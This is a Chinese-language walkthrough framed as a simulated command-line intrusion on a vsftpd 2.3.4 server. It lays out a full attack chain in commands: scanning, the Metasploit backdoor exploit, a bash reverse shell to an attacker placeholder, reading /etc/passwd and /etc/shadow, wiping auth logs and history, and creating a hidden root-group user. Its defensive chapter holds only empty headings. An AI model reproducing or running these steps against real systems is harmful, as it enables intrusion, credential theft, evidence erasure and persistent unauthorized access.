序幕:虚拟战场设定
我们模拟一个基于命令行的网络渗透场景,目标为虚拟环境中的一台运行旧版FTP服务(vsftpd 2.3.4)的Linux服务器(IP:192.168.1.10)。攻击者将利用已知漏洞、系统工具及后渗透技术,完成从信息收集到权限控制的完整入侵链。
第一章:暗夜侦查——信息收集
1. 端口探测与指纹识别
攻击者使用`nmap`进行隐蔽扫描,锁定开放端口及服务版本:
bash
nmap -sS -Pn 192.168.1.10 SYN扫描跳过主机存活检测
nmap -sV -p 21 192.168.1.10 检测FTP服务版本
结果显示21端口运行vsftpd 2.3.4,该版本存在后门漏洞(CVE-2011-2523)。
2. 漏洞数据库匹配
通过Metasploit搜索漏洞模块:
bash
msfconsole
search vsftpd 定位exploit/unix/ftp/vsftpd_234_backdoor
第二章:漏洞利刃——权限突破
1. Metasploit载荷注入
配置攻击参数并触发漏洞:
bash
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST 192.168.1.10
set RPORT 21
exploit 成功获取反向Shell
漏洞利用后,攻击者获得root权限(`whoami`验证)。
2. 隐蔽通道构建
通过Netcat建立持久化连接:
bash
攻击端监听
nc -lvp 4444
目标端执行反向Shell
bash -i >& /dev/tcp/攻击者IP/4444 0>&1
确保即使会话中断仍可重连。
第三章:暗影潜伏——后渗透操控
1. 横向移动与数据窃取
bash
cat /etc/passwd 获取用户列表
cat /etc/shadow 提取哈希密码(需破解)
2. 日志擦除与痕迹掩盖
bash
echo "" > /var/log/auth.log 清除认证日志
history -c 清空当前Shell历史记录
避免触发安全告警。
3. 权限维持
bash
useradd -M -s /bin/bash -g root stealthuser
passwd stealthuser 设置弱口令或SSH密钥
第四章:防御视角——漏洞修复与防护
1. 服务加固
2. 网络层防护
3. 日志审计与应急响应
尾声:虚拟与现实的边界
本次模拟揭示了命令行工具在渗透测试中的双重性:攻击者可凭借`nmap`、`metasploit`等利器突破防线,防御者亦需通过`arp`表分析(`arp -a`)、端口监控(`netstat -ano`)等手段构建纵深防御。
注:本实验仅限授权环境,真实场景中未经许可的渗透行为属违法。